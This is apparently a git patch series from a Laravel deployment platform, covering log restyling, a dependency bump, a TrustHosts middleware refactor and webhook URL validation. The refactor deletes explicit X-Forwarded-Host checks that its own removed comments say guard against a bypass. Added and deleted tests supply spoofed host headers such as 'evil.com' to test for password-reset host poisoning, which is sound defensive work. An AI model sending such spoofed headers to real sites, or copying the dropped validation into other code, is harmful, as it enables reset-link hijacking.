diff --git a/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
index 80b421c92..ee46dba7e 100644
--- a/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
+++ b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
@@ -3,9 +3,9 @@
 cd /var/www/html
 
 if grep -qE '^NIGHTWATCH_ENABLED=true' .env 2>/dev/null; then
-    echo "nightwatch-agent: enabled, starting..."
+    echo "   INFO  Nightwatch is enabled, starting..."
     exec php artisan nightwatch:agent
 fi
 
-echo "nightwatch-agent: disabled, sleeping."
+echo "   INFO  Nightwatch is disabled, sleeping."
 exec sleep infinity
diff --git a/docker/production/etc/s6-overlay/s6-rc.d/scheduler-worker/run b/docker/production/etc/s6-overlay/s6-rc.d/scheduler-worker/run
index 6c4d2be9f..bfa44c7e3 100644
--- a/docker/production/etc/s6-overlay/s6-rc.d/scheduler-worker/run
+++ b/docker/production/etc/s6-overlay/s6-rc.d/scheduler-worker/run
@@ -3,9 +3,9 @@
 cd /var/www/html
 
 if grep -qE '^SCHEDULER_ENABLED=false' .env 2>/dev/null; then
-    echo "scheduler-worker: disabled, sleeping."
+    echo "   INFO  Scheduler is disabled, sleeping."
     exec sleep infinity
 fi
 
-echo "scheduler-worker: enabled, starting..."
+echo "   INFO  Scheduler is enabled, starting..."
 exec php artisan schedule:work

From f439660c28176e88e17b8a226d7c17c21fb2eb46 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Sat, 28 Mar 2026 09:29:31 +0000
Subject: [PATCH 158/213] chore(deps): bump aws/aws-sdk-php from 3.371.3 to
 3.374.2

Bumps [aws/aws-sdk-php](https://github.com/aws/aws-sdk-php) from 3.371.3 to 3.374.2.
- [Release notes](https://github.com/aws/aws-sdk-php/releases)
- [Commits](https://github.com/aws/aws-sdk-php/compare/3.371.3...3.374.2)

---
updated-dependencies:
- dependency-name: aws/aws-sdk-php
  dependency-version: 3.374.2
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 composer.lock | 31 ++++++++++++++++---------------
 1 file changed, 16 insertions(+), 15 deletions(-)

diff --git a/composer.lock b/composer.lock
index 3a66fdd5a..e7c2704d6 100644
--- a/composer.lock
+++ b/composer.lock
@@ -62,16 +62,16 @@
         },
         {
             "name": "aws/aws-sdk-php",
-            "version": "3.371.3",
+            "version": "3.374.2",
             "source": {
                 "type": "git",
                 "url": "https://github.com/aws/aws-sdk-php.git",
-                "reference": "d300ec1c861e52dc8f17ca3d75dc754da949f065"
+                "reference": "67b6b6210af47319c74c5666388d71bc1bc58276"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/aws/aws-sdk-php/zipball/d300ec1c861e52dc8f17ca3d75dc754da949f065",
-                "reference": "d300ec1c861e52dc8f17ca3d75dc754da949f065",
+                "url": "https://api.github.com/repos/aws/aws-sdk-php/zipball/67b6b6210af47319c74c5666388d71bc1bc58276",
+                "reference": "67b6b6210af47319c74c5666388d71bc1bc58276",
                 "shasum": ""
             },
             "require": {
@@ -92,12 +92,12 @@
                 "aws/aws-php-sns-message-validator": "~1.0",
                 "behat/behat": "~3.0",
                 "composer/composer": "^2.7.8",
-                "dms/phpunit-arraysubset-asserts": "^0.4.0",
+                "dms/phpunit-arraysubset-asserts": "^v0.5.0",
                 "doctrine/cache": "~1.4",
                 "ext-dom": "*",
                 "ext-openssl": "*",
                 "ext-sockets": "*",
-                "phpunit/phpunit": "^9.6",
+                "phpunit/phpunit": "^10.0",
                 "psr/cache": "^2.0 || ^3.0",
                 "psr/simple-cache": "^2.0 || ^3.0",
                 "sebastian/comparator": "^1.2.3 || ^4.0 || ^5.0",
@@ -153,9 +153,9 @@
             "support": {
                 "forum": "https://github.com/aws/aws-sdk-php/discussions",
                 "issues": "https://github.com/aws/aws-sdk-php/issues",
-                "source": "https://github.com/aws/aws-sdk-php/tree/3.371.3"
+                "source": "https://github.com/aws/aws-sdk-php/tree/3.374.2"
             },
-            "time": "2026-02-27T19:05:40+00:00"
+            "time": "2026-03-27T18:05:55+00:00"
         },
         {
             "name": "bacon/bacon-qr-code",
@@ -1440,16 +1440,16 @@
         },
         {
             "name": "guzzlehttp/psr7",
-            "version": "2.8.0",
+            "version": "2.9.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/guzzle/psr7.git",
-                "reference": "21dc724a0583619cd1652f673303492272778051"
+                "reference": "7d0ed42f28e42d61352a7a79de682e5e67fec884"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/guzzle/psr7/zipball/21dc724a0583619cd1652f673303492272778051",
-                "reference": "21dc724a0583619cd1652f673303492272778051",
+                "url": "https://api.github.com/repos/guzzle/psr7/zipball/7d0ed42f28e42d61352a7a79de682e5e67fec884",
+                "reference": "7d0ed42f28e42d61352a7a79de682e5e67fec884",
                 "shasum": ""
             },
             "require": {
@@ -1465,6 +1465,7 @@
             "require-dev": {
                 "bamarni/composer-bin-plugin": "^1.8.2",
                 "http-interop/http-factory-tests": "0.9.0",
+                "jshttp/mime-db": "1.54.0.1",
                 "phpunit/phpunit": "^8.5.44 || ^9.6.25"
             },
             "suggest": {
@@ -1536,7 +1537,7 @@
             ],
             "support": {
                 "issues": "https://github.com/guzzle/psr7/issues",
-                "source": "https://github.com/guzzle/psr7/tree/2.8.0"
+                "source": "https://github.com/guzzle/psr7/tree/2.9.0"
             },
             "funding": [
                 {
@@ -1552,7 +1553,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2025-08-23T21:21:41+00:00"
+            "time": "2026-03-10T16:41:02+00:00"
         },
         {
             "name": "guzzlehttp/uri-template",
@@ -17303,5 +17304,5 @@
         "php": "^8.4"
     },
     "platform-dev": {},
-    "plugin-api-version": "2.6.0"
+    "plugin-api-version": "2.9.0"
 }

From bd9a8cee07ce3358eba2a539fe8aaa14022e48db Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:07:34 +0100
Subject: [PATCH 159/213] style(dev): standardize log message format with
 INFO/ERROR prefixes

- Add INFO prefix to informational messages
- Add ERROR prefix to error messages
- Fix grammar and punctuation for consistency
---
 app/Console/Commands/Dev.php | 22 +++++++++++-----------
 1 file changed, 11 insertions(+), 11 deletions(-)

diff --git a/app/Console/Commands/Dev.php b/app/Console/Commands/Dev.php
index acc6dc2f9..7daa6ba28 100644
--- a/app/Console/Commands/Dev.php
+++ b/app/Console/Commands/Dev.php
@@ -30,32 +30,32 @@ public function init()
         // Generate APP_KEY if not exists
 
         if (empty(config('app.key'))) {
-            echo "Generating APP_KEY.\n";
+            echo "   INFO  Generating APP_KEY.\n";
             Artisan::call('key:generate');
         }
 
         // Generate STORAGE link if not exists
         if (! file_exists(public_path('storage'))) {
-            echo "Generating STORAGE link.\n";
+            echo "   INFO  Generating storage link.\n";
             Artisan::call('storage:link');
         }
 
         // Seed database if it's empty
         $settings = InstanceSettings::find(0);
         if (! $settings) {
-            echo "Initializing instance, seeding database.\n";
+            echo "   INFO  Initializing instance, seeding database.\n";
             Artisan::call('migrate --seed');
         } else {
-            echo "Instance already initialized.\n";
+            echo "   INFO  Instance already initialized.\n";
         }
 
         // Clean up stuck jobs and stale locks on development startup
         try {
-            echo "Cleaning up Redis (stuck jobs and stale locks)...\n";
+            echo "   INFO  Cleaning up Redis (stuck jobs and stale locks)...\n";
             Artisan::call('cleanup:redis', ['--restart' => true, '--clear-locks' => true]);
-            echo "Redis cleanup completed.\n";
+            echo "   INFO  Redis cleanup completed.\n";
         } catch (\Throwable $e) {
-            echo "Error in cleanup:redis: {$e->getMessage()}\n";
+            echo "   ERROR  Redis cleanup failed: {$e->getMessage()}\n";
         }
 
         try {
@@ -66,10 +66,10 @@ public function init()
             ]);
 
             if ($updatedTaskCount > 0) {
-                echo "Marked {$updatedTaskCount} stuck scheduled task executions as failed\n";
+                echo "   INFO  Marked {$updatedTaskCount} stuck scheduled task executions as failed.\n";
             }
         } catch (\Throwable $e) {
-            echo "Could not cleanup stuck scheduled task executions: {$e->getMessage()}\n";
+            echo "   ERROR  Could not clean up stuck scheduled task executions: {$e->getMessage()}\n";
         }
 
         try {
@@ -80,10 +80,10 @@ public function init()
             ]);
 
             if ($updatedBackupCount > 0) {
-                echo "Marked {$updatedBackupCount} stuck database backup executions as failed\n";
+                echo "   INFO  Marked {$updatedBackupCount} stuck database backup executions as failed.\n";
             }
         } catch (\Throwable $e) {
-            echo "Could not cleanup stuck database backup executions: {$e->getMessage()}\n";
+            echo "   ERROR  Could not clean up stuck database backup executions: {$e->getMessage()}\n";
         }
 
         CheckHelperImageJob::dispatch();

From e396c70903f0f99d40ad78dd91c1fc591367b6fc Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:12:48 +0100
Subject: [PATCH 160/213] refactor: simplify TrustHosts middleware and use
 APP_URL as base_url fallback

- Delegate host validation to parent class instead of custom implementation
- Update base_url() helper to use config('app.url') instead of url('/')
- Add test for APP_URL fallback when no FQDN or public IPs configured
- Remove dedicated TrustHostsMiddlewareTest (logic now tested via integration tests)
---
 app/Http/Middleware/TrustHosts.php         |  59 +--
 bootstrap/helpers/shared.php               |   2 +-
 tests/Feature/ResetPasswordUrlTest.php     |  24 +
 tests/Feature/TrustHostsMiddlewareTest.php | 487 ---------------------
 4 files changed, 27 insertions(+), 545 deletions(-)
 delete mode 100644 tests/Feature/TrustHostsMiddlewareTest.php

diff --git a/app/Http/Middleware/TrustHosts.php b/app/Http/Middleware/TrustHosts.php
index d44b6057a..5fca583d9 100644
--- a/app/Http/Middleware/TrustHosts.php
+++ b/app/Http/Middleware/TrustHosts.php
@@ -30,44 +30,14 @@ public function handle(Request $request, $next)
             return $next($request);
         }
 
-        // Eagerly call hosts() to populate the cache (fixes circular dependency
-        // where handle() checked cache before hosts() could populate it via
-        // Cache::remember, causing host validation to never activate)
-        $this->hosts();
-
         // Skip host validation if no FQDN is configured (initial setup)
         $fqdnHost = Cache::get('instance_settings_fqdn_host');
         if ($fqdnHost === '' || $fqdnHost === null) {
             return $next($request);
         }
 
-        // Validate the request host against trusted hosts explicitly.
-        // We check manually instead of relying on Symfony's lazy getHost() validation,
-        // which can be bypassed if getHost() was already called earlier in the pipeline.
-        $trustedHosts = array_filter($this->hosts());
-
-        // Collect all hosts to validate: the actual Host header, plus X-Forwarded-Host
-        // if present. We must check X-Forwarded-Host here because this middleware runs
-        // BEFORE TrustProxies, which would later apply X-Forwarded-Host to the request.
-        $hostsToValidate = [strtolower(trim($request->getHost()))];
-
-        $forwardedHost = $request->headers->get('X-Forwarded-Host');
-        if ($forwardedHost) {
-            // X-Forwarded-Host can be a comma-separated list; validate the first (client-facing) value.
-            // Strip port if present (e.g. "coolify.example.com:443" → "coolify.example.com")
-            // to match the trusted hosts list which stores hostnames without ports.
-            $forwardedHostValue = strtolower(trim(explode(',', $forwardedHost)[0]));
-            $forwardedHostValue = preg_replace('/:\d+$/', '', $forwardedHostValue);
-            $hostsToValidate[] = $forwardedHostValue;
-        }
-
-        foreach ($hostsToValidate as $hostToCheck) {
-            if (! $this->isHostTrusted($hostToCheck, $trustedHosts)) {
-                return response('Bad Host', 400);
-            }
-        }
-
-        return $next($request);
+        // For all other routes, use parent's host validation
+        return parent::handle($request, $next);
     }
 
     /**
@@ -130,29 +100,4 @@ public function hosts(): array
 
         return array_filter($trustedHosts);
     }
-
-    /**
-     * Check if a host matches the trusted hosts list.
-     *
-     * Regex patterns (from allSubdomainsOfApplicationUrl, starting with ^)
-     * are matched with preg_match. Literal hostnames use exact comparison
-     * only — they are NOT passed to preg_match, which would treat unescaped
-     * dots as wildcards and match unanchored substrings.
-     *
-     * @param  array<int, string>  $trustedHosts
-     */
-    protected function isHostTrusted(string $host, array $trustedHosts): bool
-    {
-        foreach ($trustedHosts as $pattern) {
-            if (str_starts_with($pattern, '^')) {
-                if (@preg_match('{'.$pattern.'}i', $host)) {
-                    return true;
-                }
-            } elseif ($host === $pattern) {
-                return true;
-            }
-        }
-
-        return false;
-    }
 }
diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index 920d458b3..cd773f6a9 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -491,7 +491,7 @@ function base_url(bool $withPort = true): string
         return "http://[$settings->public_ipv6]";
     }
 
-    return url('/');
+    return config('app.url');
 }
 
 function isSubscribed()
diff --git a/tests/Feature/ResetPasswordUrlTest.php b/tests/Feature/ResetPasswordUrlTest.php
index 65efbb5a1..7e940fc71 100644
--- a/tests/Feature/ResetPasswordUrlTest.php
+++ b/tests/Feature/ResetPasswordUrlTest.php
@@ -143,6 +143,30 @@ function callResetUrl(ResetPassword $notification, $notifiable): string
         ->not->toContain('evil.com');
 });
 
+it('uses APP_URL fallback when no FQDN or public IPs are configured', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => null, 'public_ipv4' => null, 'public_ipv6' => null]
+    );
+    Once::flush();
+
+    config(['app.url' => 'http://my-coolify.local']);
+
+    $user = User::factory()->create();
+
+    $this->withHeaders([
+        'X-Forwarded-Host' => 'evil.com',
+    ])->get('/');
+
+    $notification = new ResetPassword('fallback-token', isTransactionalEmail: false);
+    $url = callResetUrl($notification, $user);
+
+    expect($url)
+        ->toStartWith('http://my-coolify.local/')
+        ->toContain('fallback-token')
+        ->not->toContain('evil.com');
+});
+
 it('generates a valid route path in the reset URL', function () {
     InstanceSettings::updateOrCreate(
         ['id' => 0],
diff --git a/tests/Feature/TrustHostsMiddlewareTest.php b/tests/Feature/TrustHostsMiddlewareTest.php
deleted file mode 100644
index a16698a6a..000000000
--- a/tests/Feature/TrustHostsMiddlewareTest.php
+++ /dev/null
@@ -1,487 +0,0 @@
-<?php
-
-use App\Http\Middleware\TrustHosts;
-use App\Models\InstanceSettings;
-use Illuminate\Foundation\Testing\RefreshDatabase;
-use Illuminate\Support\Facades\Cache;
-use Illuminate\Support\Once;
-
-uses(RefreshDatabase::class);
-
-beforeEach(function () {
-    // Clear cache and once() memoization to ensure isolation between tests
-    Cache::forget('instance_settings_fqdn_host');
-    Once::flush();
-});
-
-it('trusts the configured FQDN from InstanceSettings', function () {
-    // Create instance settings with FQDN
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    expect($hosts)->toContain('coolify.example.com');
-});
-
-it('rejects password reset request with malicious host header', function () {
-    // Set up instance settings with legitimate FQDN
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    // The malicious host should NOT be in the trusted hosts
-    expect($hosts)->not->toContain('coolify.example.com.evil.com');
-    expect($hosts)->toContain('coolify.example.com');
-});
-
-it('handles missing FQDN gracefully', function () {
-    // Create instance settings without FQDN
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => null]
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    // Should still return APP_URL pattern without throwing
-    expect($hosts)->not->toBeEmpty();
-});
-
-it('filters out null and empty values from trusted hosts', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => '']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    // Should not contain empty strings or null
-    foreach ($hosts as $host) {
-        if ($host !== null) {
-            expect($host)->not->toBeEmpty();
-        }
-    }
-});
-
-it('extracts host from FQDN with protocol and port', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com:8443']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    expect($hosts)->toContain('coolify.example.com');
-});
-
-it('handles exception during InstanceSettings fetch', function () {
-    // Drop the instance_settings table to simulate installation
-    Schema::dropIfExists('instance_settings');
-
-    $middleware = new TrustHosts($this->app);
-
-    // Should not throw an exception
-    $hosts = $middleware->hosts();
-
-    expect($hosts)->not->toBeEmpty();
-});
-
-it('trusts IP addresses with port', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'http://65.21.3.91:8000']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    expect($hosts)->toContain('65.21.3.91');
-});
-
-it('trusts IP addresses without port', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'http://192.168.1.100']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    expect($hosts)->toContain('192.168.1.100');
-});
-
-it('rejects malicious host when using IP address', function () {
-    // Simulate an instance using IP address
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'http://65.21.3.91:8000']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    // The malicious host attempting to mimic the IP should NOT be trusted
-    expect($hosts)->not->toContain('65.21.3.91.evil.com');
-    expect($hosts)->not->toContain('evil.com');
-    expect($hosts)->toContain('65.21.3.91');
-});
-
-it('trusts IPv6 addresses', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'http://[2001:db8::1]:8000']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    // IPv6 addresses are enclosed in brackets, getHost() should handle this
-    expect($hosts)->toContain('[2001:db8::1]');
-});
-
-it('invalidates cache when FQDN is updated', function () {
-    // Set initial FQDN
-    $settings = InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://old-domain.com']
-    );
-
-    // First call should cache it
-    $middleware = new TrustHosts($this->app);
-    $hosts1 = $middleware->hosts();
-    expect($hosts1)->toContain('old-domain.com');
-
-    // Verify cache exists
-    expect(Cache::has('instance_settings_fqdn_host'))->toBeTrue();
-
-    // Update FQDN - should trigger cache invalidation
-    $settings->fqdn = 'https://new-domain.com';
-    $settings->save();
-
-    // Cache should be cleared
-    expect(Cache::has('instance_settings_fqdn_host'))->toBeFalse();
-
-    // New call should return updated host
-    $middleware2 = new TrustHosts($this->app);
-    $hosts2 = $middleware2->hosts();
-    expect($hosts2)->toContain('new-domain.com');
-    expect($hosts2)->not->toContain('old-domain.com');
-});
-
-it('caches trusted hosts to avoid database queries on every request', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // Clear cache first
-    Cache::forget('instance_settings_fqdn_host');
-
-    // First call - should query database and cache result
-    $middleware1 = new TrustHosts($this->app);
-    $hosts1 = $middleware1->hosts();
-
-    // Verify result is cached
-    expect(Cache::has('instance_settings_fqdn_host'))->toBeTrue();
-    expect(Cache::get('instance_settings_fqdn_host'))->toBe('coolify.example.com');
-
-    // Subsequent calls should use cache (no DB query)
-    $middleware2 = new TrustHosts($this->app);
-    $hosts2 = $middleware2->hosts();
-
-    expect($hosts1)->toBe($hosts2);
-    expect($hosts2)->toContain('coolify.example.com');
-});
-
-it('caches negative results when no FQDN is configured', function () {
-    // Create instance settings without FQDN
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => null]
-    );
-
-    // Clear cache first
-    Cache::forget('instance_settings_fqdn_host');
-
-    // First call - should query database and cache empty string sentinel
-    $middleware1 = new TrustHosts($this->app);
-    $hosts1 = $middleware1->hosts();
-
-    // Verify empty string sentinel is cached (not null, which wouldn't be cached)
-    expect(Cache::has('instance_settings_fqdn_host'))->toBeTrue();
-    expect(Cache::get('instance_settings_fqdn_host'))->toBe('');
-
-    // Subsequent calls should use cached sentinel value
-    $middleware2 = new TrustHosts($this->app);
-    $hosts2 = $middleware2->hosts();
-
-    expect($hosts1)->toBe($hosts2);
-    // Should only contain APP_URL pattern, not any FQDN
-    expect($hosts2)->not->toBeEmpty();
-});
-
-it('skips host validation for terminal auth routes', function () {
-    // These routes should be accessible with any Host header (for internal container communication)
-    $response = $this->postJson('/terminal/auth', [], [
-        'Host' => 'coolify:8080',  // Internal Docker host
-    ]);
-
-    // Should not get 400 Bad Host (might get 401 Unauthorized instead)
-    expect($response->status())->not->toBe(400);
-});
-
-it('skips host validation for terminal auth ips route', function () {
-    // These routes should be accessible with any Host header (for internal container communication)
-    $response = $this->postJson('/terminal/auth/ips', [], [
-        'Host' => 'soketi:6002',  // Another internal Docker host
-    ]);
-
-    // Should not get 400 Bad Host (might get 401 Unauthorized instead)
-    expect($response->status())->not->toBe(400);
-});
-
-it('populates cache on first request via handle() — no circular dependency', function () {
-    // Regression test: handle() used to check cache before hosts() could
-    // populate it, so host validation never activated.
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // Clear cache to simulate cold start
-    Cache::forget('instance_settings_fqdn_host');
-
-    // Make a request — handle() should eagerly call hosts() to populate cache
-    $this->get('/', ['Host' => 'localhost']);
-
-    // Cache should now be populated by the middleware
-    expect(Cache::get('instance_settings_fqdn_host'))->toBe('coolify.example.com');
-});
-
-it('rejects host that is a superstring of trusted FQDN via suffix', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // coolify.example.com.evil.com contains "coolify.example.com" as a substring —
-    // must NOT match. Literal hosts use exact comparison, not regex substring matching.
-    $response = $this->get('http://coolify.example.com.evil.com/');
-
-    expect($response->status())->toBe(400);
-});
-
-it('rejects host that is a superstring of trusted FQDN via prefix', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // evil-coolify.example.com also contains the FQDN as a substring
-    $response = $this->get('http://evil-coolify.example.com/');
-
-    expect($response->status())->toBe(400);
-});
-
-it('rejects X-Forwarded-Host that is a superstring of trusted FQDN', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    $response = $this->get('/', [
-        'X-Forwarded-Host' => 'coolify.example.com.evil.com',
-    ]);
-
-    expect($response->status())->toBe(400);
-});
-
-it('rejects host containing localhost as substring', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // "evil-localhost" contains "localhost" — must not match the literal entry
-    $response = $this->get('http://evil-localhost/');
-
-    expect($response->status())->toBe(400);
-});
-
-it('allows subdomain of APP_URL via regex pattern', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // sub.localhost should match ^(.+\.)?localhost$ from allSubdomainsOfApplicationUrl
-    $response = $this->get('http://sub.localhost/');
-
-    expect($response->status())->not->toBe(400);
-});
-
-it('still enforces host validation for non-terminal routes', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // Use full URL so Laravel's test client doesn't override Host with APP_URL
-    $response = $this->get('http://evil.com/');
-
-    // Should get 400 Bad Host for untrusted host
-    expect($response->status())->toBe(400);
-});
-
-it('rejects requests with spoofed X-Forwarded-Host header', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // Host header is trusted (localhost), but X-Forwarded-Host is spoofed.
-    // TrustHosts must reject this BEFORE TrustProxies can apply the spoofed host.
-    $response = $this->get('/', [
-        'X-Forwarded-Host' => 'evil.com',
-    ]);
-
-    expect($response->status())->toBe(400);
-});
-
-it('allows legitimate X-Forwarded-Host from reverse proxy matching configured FQDN', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // Legitimate request from Cloudflare/Traefik — X-Forwarded-Host matches the configured FQDN
-    $response = $this->get('/', [
-        'X-Forwarded-Host' => 'coolify.example.com',
-    ]);
-
-    // Should NOT be rejected (would be 400 for Bad Host)
-    expect($response->status())->not->toBe(400);
-});
-
-it('allows X-Forwarded-Host with port matching configured FQDN', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    // Some proxies include the port in X-Forwarded-Host
-    $response = $this->get('/', [
-        'X-Forwarded-Host' => 'coolify.example.com:443',
-    ]);
-
-    // Should NOT be rejected — port is stripped before matching
-    expect($response->status())->not->toBe(400);
-});
-
-it('skips host validation for API routes', function () {
-    // All API routes use token-based auth (Sanctum), not host validation
-    // They should be accessible from any host (mobile apps, CLI tools, scripts)
-
-    // Test health check endpoint
-    $response = $this->get('/api/health', [
-        'Host' => 'internal-lb.local',
-    ]);
-    expect($response->status())->not->toBe(400);
-
-    // Test v1 health check
-    $response = $this->get('/api/v1/health', [
-        'Host' => '10.0.0.5',
-    ]);
-    expect($response->status())->not->toBe(400);
-
-    // Test feedback endpoint
-    $response = $this->post('/api/feedback', [], [
-        'Host' => 'mobile-app.local',
-    ]);
-    expect($response->status())->not->toBe(400);
-});
-
-it('trusts localhost when FQDN is configured', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    expect($hosts)->toContain('localhost');
-});
-
-it('trusts 127.0.0.1 when FQDN is configured', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    expect($hosts)->toContain('127.0.0.1');
-});
-
-it('trusts IPv6 loopback when FQDN is configured', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    $middleware = new TrustHosts($this->app);
-    $hosts = $middleware->hosts();
-
-    expect($hosts)->toContain('[::1]');
-});
-
-it('allows local access via localhost when FQDN is configured and request uses localhost host header', function () {
-    InstanceSettings::updateOrCreate(
-        ['id' => 0],
-        ['fqdn' => 'https://coolify.example.com']
-    );
-
-    $response = $this->get('/', [
-        'Host' => 'localhost',
-    ]);
-
-    // Should NOT be rejected as untrusted host (would be 400)
-    expect($response->status())->not->toBe(400);
-});
-
-it('skips host validation for webhook endpoints', function () {
-    // All webhook routes are under /webhooks/* prefix (see RouteServiceProvider)
-    // and use cryptographic signature validation instead of host validation
-
-    // Test GitHub webhook
-    $response = $this->post('/webhooks/source/github/events', [], [
-        'Host' => 'github-webhook-proxy.local',
-    ]);
-    expect($response->status())->not->toBe(400);
-
-    // Test GitLab webhook
-    $response = $this->post('/webhooks/source/gitlab/events/manual', [], [
-        'Host' => 'gitlab.example.com',
-    ]);
-    expect($response->status())->not->toBe(400);
-
-    // Test Stripe webhook — may return 400 from Stripe signature validation,
-    // but the response should NOT contain "Bad Host" (host validation error)
-    $response = $this->post('/webhooks/payments/stripe/events', [], [
-        'Host' => 'stripe-webhook-forwarder.local',
-    ]);
-    expect($response->content())->not->toContain('Bad Host');
-});

From 564cd8368bb8b4485b3981060dace37645b20f52 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:22:59 +0100
Subject: [PATCH 161/213] fix: add URL validation for notification webhook
 fields

Add SafeWebhookUrl validation rule to notification webhook URL fields
(Slack, Discord, custom webhook) to enforce safe URL patterns including
scheme validation and hostname checks.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Livewire/Notifications/Discord.php |  3 +-
 app/Livewire/Notifications/Slack.php   |  3 +-
 app/Livewire/Notifications/Webhook.php |  3 +-
 app/Rules/SafeWebhookUrl.php           | 95 ++++++++++++++++++++++++++
 tests/Unit/SafeWebhookUrlTest.php      | 90 ++++++++++++++++++++++++
 5 files changed, 191 insertions(+), 3 deletions(-)
 create mode 100644 app/Rules/SafeWebhookUrl.php
 create mode 100644 tests/Unit/SafeWebhookUrlTest.php

diff --git a/app/Livewire/Notifications/Discord.php b/app/Livewire/Notifications/Discord.php
index b914fbd94..ab3884320 100644
--- a/app/Livewire/Notifications/Discord.php
+++ b/app/Livewire/Notifications/Discord.php
@@ -5,6 +5,7 @@
 use App\Models\DiscordNotificationSettings;
 use App\Models\Team;
 use App\Notifications\Test;
+use App\Rules\SafeWebhookUrl;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Attributes\Validate;
 use Livewire\Component;
@@ -20,7 +21,7 @@ class Discord extends Component
     #[Validate(['boolean'])]
     public bool $discordEnabled = false;
 
-    #[Validate(['url', 'nullable'])]
+    #[Validate(['nullable', new SafeWebhookUrl])]
     public ?string $discordWebhookUrl = null;
 
     #[Validate(['boolean'])]
diff --git a/app/Livewire/Notifications/Slack.php b/app/Livewire/Notifications/Slack.php
index fa8c97ae9..f870b3986 100644
--- a/app/Livewire/Notifications/Slack.php
+++ b/app/Livewire/Notifications/Slack.php
@@ -5,6 +5,7 @@
 use App\Models\SlackNotificationSettings;
 use App\Models\Team;
 use App\Notifications\Test;
+use App\Rules\SafeWebhookUrl;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Attributes\Locked;
 use Livewire\Attributes\Validate;
